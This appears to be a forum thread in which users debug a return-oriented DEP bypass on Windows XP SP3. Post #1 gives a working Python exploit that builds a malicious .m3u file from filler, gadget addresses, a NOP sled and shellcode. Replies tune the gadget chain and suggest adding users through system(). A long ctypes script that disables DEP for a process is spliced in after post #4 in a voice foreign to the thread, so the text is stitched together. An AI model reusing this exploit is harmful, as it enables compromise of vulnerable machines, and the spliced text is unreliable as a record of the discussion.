Thread: Help bypassing DEP windows XP SP3

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    9

    Help bypassing DEP windows XP SP3

    I am trying to bypass DEP on XP SP3. Everything is going well (I believe) until I run the routine to disable NX (7c91cd44). When the call to ntdll.ZwSetInformationProcess is made I noticed 3 arguments are being passed. Arg1 is FFFFFFFF, Arg2 is 00000022 and Arg3 is 0013ED50. However, when the call returns EDX is set to FFFFFFFF and 0013ED50 now contains FFFFFFFF, which is causing failure. I have posted the proof of concept I am working on below. Any ideas why this is occurring?


    Code:
    #!/usr/bin/env python
    # Builds disabledep.m3u: 1024 bytes of filler, the DEP-bypass chain, a NOP sled and calc.exe shellcode.
    # Bytes literals and a binary file handle keep the payload byte-exact (no text-mode encoding or
    # newline translation); works on Python 3 (use raw_input instead of input on Python 2).
    filename = "disabledep.m3u"

    # calc.exe
    shellcode = (
        b"\xda\xd3\xb8\xa4\x9b\x9d\x4a\xd9\x74\x24\xf4\x2b\xc9\xb1\x33"
        b"\x5b\x31\x43\x17\x03\x43\x17\x83\x67\x9f\x7f\xbf\x9b\x48\xf6"
        b"\x40\x63\x89\x69\xc8\x86\xb8\xbb\xae\xc3\xe9\x0b\xa4\x81\x01"
        b"\xe7\xe8\x31\x91\x85\x24\x36\x12\x23\x13\x79\xa3\x85\x9b\xd5"
        b"\x67\x87\x67\x27\xb4\x67\x59\xe8\xc9\x66\x9e\x14\x21\x3a\x77"
        b"\x53\x90\xab\xfc\x21\x29\xcd\xd2\x2e\x11\xb5\x57\xf0\xe6\x0f"
        b"\x59\x20\x56\x1b\x11\xd8\xdc\x43\x82\xd9\x31\x90\xfe\x90\x3e"
        b"\x63\x74\x23\x97\xbd\x75\x12\xd7\x12\x48\x9b\xda\x6b\x8c\x1b"
        b"\x05\x1e\xe6\x58\xb8\x19\x3d\x23\x66\xaf\xa0\x83\xed\x17\x01"
        b"\x32\x21\xc1\xc2\x38\x8e\x85\x8d\x5c\x11\x49\xa6\x58\x9a\x6c"
        b"\x69\xe9\xd8\x4a\xad\xb2\xbb\xf3\xf4\x1e\x6d\x0b\xe6\xc6\xd2"
        b"\xa9\x6c\xe4\x07\xcb\x2e\x62\xd9\x59\x55\xcb\xd9\x61\x56\x7b"
        b"\xb2\x50\xdd\x14\xc5\x6c\x34\x51\x39\x27\x15\xf3\xd2\xee\xcf"
        b"\x46\xbf\x10\x3a\x84\xc6\x92\xcf\x74\x3d\x8a\xa5\x71\x79\x0c"
        b"\x55\x0b\x12\xf9\x59\xb8\x13\x28\x3a\x5f\x80\xb0\x93\xfa\x20"
        b"\x52\xec"
    )

    junk = b"\x41" * 1024                  # filler up to the overwritten return address
    adjust_ebp = b"\xEA\xE3\xB5\x7C"       # PUSH ESP at 0x7CB5E3EA [shell32.dll] (PUSH ESP / POP EBP / RET 4)
    disabledep = b"\xff\xff\xff\xff"       # offset for adjust_ebp (ret 4)
    disabledep += b"\xA0\x25\x91\x7C"      # 7C9125A0 XOR EAX, EAX / INC EAX / RET - used to set AL to 1
    disabledep += b"\xff\xff\xff\xff"
    disabledep += b"\x44\xCD\x91\x7C"      # 7C91CD44 CMP AL,1 -> run NX Disable routine
    disabledep += b"\xD7\x30\x9D\x7C"      # 7C9D30D7 JMP ESP
    nop = b"\x90" * 100                    # NOP sled in front of the shellcode

    with open(filename, "wb") as f:
        f.write(junk + adjust_ebp + disabledep + nop + shellcode)

    input("\nPress Enter to exit...")

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Re: Help bypassing DEP windows XP SP3

    Hi, this doesn't directly answer your question, but check out ROT.

    I am trying to bypass DEP on XP SP3. Everything is going well (I believe) until I run the routine to disable NX (7c91cd44). When the call to ntdll.ZwSetInformationProcess is made I noticed 3 arguments are being passed. Arg1 is FFFFFFFF, Arg2 is 00000022 and Arg3 is 0013ED50. However, when the call returns EDX is set to FFFFFFFF and 0013ED50 now contains FFFFFFFF, which is causing failure. I have posted the proof of concept I am working on below. Any ideas why this is occurring?
    Does your program have permission to access that function? Does EDX point to a struct of the values passed? Is EAX passing 0x22? Try setting a breakpoint before SetInfo, change EAX to 0x22 and EDX to the struct, jump to fastsystemcall and see if the values are the same.



    e.g.

    string: dir /p /a
    system(string)

    change to
    push string
    push esp
    push ebp ---------------> might be back to front
    push system address---->
    jmp to ret


    It is system specific and a network connection will be difficult, but adding users and such should be doable.
    coffee

    http://www.ctyme.com/intr/rb-4249.htm
    Last edited by compaq; 01-01-2011 at 12:24 PM.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    9

    Re: Help bypassing DEP windows XP SP3

    It looks like the call to ZwSetInformationProcess does not clear the stack, so when it returns I have those arguments pushed on the stack. Does anyone have a method to adjust the stack once the NX routine is finished?

  4. #4
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    13

    Re: Help bypassing DEP windows XP SP3

    To disable DEP for a process you need to make a call to NtSetInformationProcess() with the ProcessInformationClass set to ProcessExecuteFlags (0x22) and the ProcessInformation marker set to MEM_EXECUTE_OPTION_ENABLE (0x2).
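The call described in post #4, made directly from Python with ctypes, as an added example that is not code from this thread: it writes MEM_EXECUTE_OPTION_ENABLE through NtSetInformationProcess(ProcessExecuteFlags) for the current process and reads the flag word back with NtQueryInformationProcess(ProcessExecuteFlags) so the change can be confirmed without a debugger. The function names and constants are the documented ntdll ones; the flag names other than ENABLE, and the nt_success/describe_execute_flags helpers, are this example's own. It is only meaningful for a 32-bit process on the XP SP2/SP3-era Windows the thread targets; on a 64-bit process, or once the PERMANENT bit is set, the kernel refuses the change. On non-Windows hosts the two native-call wrappers return None.

```python
import ctypes
import sys

IS_WINDOWS = sys.platform == "win32"

# ProcessInformationClass and flag value from post #4; the remaining bits are the
# companions of that flag word (assumed names, matching the usual documentation).
ProcessExecuteFlags = 0x22
MEM_EXECUTE_OPTION_DISABLE = 0x1
MEM_EXECUTE_OPTION_ENABLE = 0x2
MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION = 0x4
MEM_EXECUTE_OPTION_PERMANENT = 0x8      # once set, later changes are refused

NT_CURRENT_PROCESS = ctypes.c_void_p(-1)  # the FFFFFFFF pseudo-handle seen as Arg1 in post #1


def nt_success(status):
    """NTSTATUS values with the sign bit clear (0x00000000..0x7FFFFFFF) are success/informational."""
    return (status & 0xFFFFFFFF) < 0x80000000


def describe_execute_flags(flags):
    """Split the ProcessExecuteFlags word into its named bits."""
    return {
        "disable": bool(flags & MEM_EXECUTE_OPTION_DISABLE),
        "enable": bool(flags & MEM_EXECUTE_OPTION_ENABLE),
        "disable_thunk_emulation": bool(flags & MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION),
        "permanent": bool(flags & MEM_EXECUTE_OPTION_PERMANENT),
    }


def _ntdll():
    """Resolve the two native calls with explicit prototypes (Windows only)."""
    ntdll = ctypes.WinDLL("ntdll")
    ntdll.NtSetInformationProcess.restype = ctypes.c_long
    ntdll.NtSetInformationProcess.argtypes = [
        ctypes.c_void_p, ctypes.c_ulong, ctypes.c_void_p, ctypes.c_ulong]
    ntdll.NtQueryInformationProcess.restype = ctypes.c_long
    ntdll.NtQueryInformationProcess.argtypes = [
        ctypes.c_void_p, ctypes.c_ulong, ctypes.c_void_p, ctypes.c_ulong,
        ctypes.POINTER(ctypes.c_ulong)]
    return ntdll


def query_execute_flags():
    """Current execute flags of this process as an int; None off Windows or if the query fails."""
    if not IS_WINDOWS:
        return None
    flags, returned = ctypes.c_ulong(0), ctypes.c_ulong(0)
    status = _ntdll().NtQueryInformationProcess(
        NT_CURRENT_PROCESS, ProcessExecuteFlags, ctypes.byref(flags),
        ctypes.sizeof(flags), ctypes.byref(returned))
    return flags.value if nt_success(status) else None


def set_execute_flags(value):
    """Write the flag word (e.g. MEM_EXECUTE_OPTION_ENABLE); returns the NTSTATUS, None off Windows."""
    if not IS_WINDOWS:
        return None
    flags = ctypes.c_ulong(value)
    status = _ntdll().NtSetInformationProcess(
        NT_CURRENT_PROCESS, ProcessExecuteFlags, ctypes.byref(flags), ctypes.sizeof(flags))
    return status & 0xFFFFFFFF


if __name__ == "__main__":
    before = query_execute_flags()
    print("before:", None if before is None else (hex(before), describe_execute_flags(before)))
    status = set_execute_flags(MEM_EXECUTE_OPTION_ENABLE)
    print("NtSetInformationProcess:", None if status is None
          else "0x%08X ok=%s" % (status, nt_success(status)))
    after = query_execute_flags()
    print("after:", None if after is None else (hex(after), describe_execute_flags(after)))
```

Run it under a 32-bit Python on the target: a DEP-protected process reports the DISABLE bit before the call and the ENABLE bit afterwards; a non-success NTSTATUS from set_execute_flags (or an unchanged "after" word) is the fast way to tell that the process is 64-bit or has the PERMANENT bit set before spending time on the ROP chain.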

  5. #5
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Re: Help bypassing DEP windows XP SP3

    It looks like the call to ZwSetInformationProcess does not clear the stack, so when it returns I have those arguments pushed on the stack. Does anyone have a method to adjust the stack once the NX routine is finished?
    junk = "\x41" * 101c

    jmp to shellcode eb ** = 0x12345678

    adjust_ebp = "\xEA\xE3\xB5\x7C" # PUSH ESP at 0x7CB5E3EA [shell32.dll] (PUSH ESP / POP EBP / RET 4)
    disabledep = "\xff\xff\xff\xff" # offset for adjust_ebp (ret 4)
    disabledep += "\xA0\x25\x91\x7C" # 7C9125A0 XOR EAX, EAX / INC EAX / RET - used to set AL to 1
    disabledep += "\xff\xff\xff\xff"
    disabledep += "\x44\xCD\x91\x7C" # 7C91CD44 CMP AL,1 -> run NX Disable routine

    jmp to jmp shellcode 0x12345678, below sets ebp to this
    disabledep += "\xD7\x30\x9D\x7C" # 7C9D30D7 JMP ESP
    jmp to ret = then jumps to jmp esp, and sets ebp to above


    Can you post a picture of the debugger?


    nop = "\x90" * 100
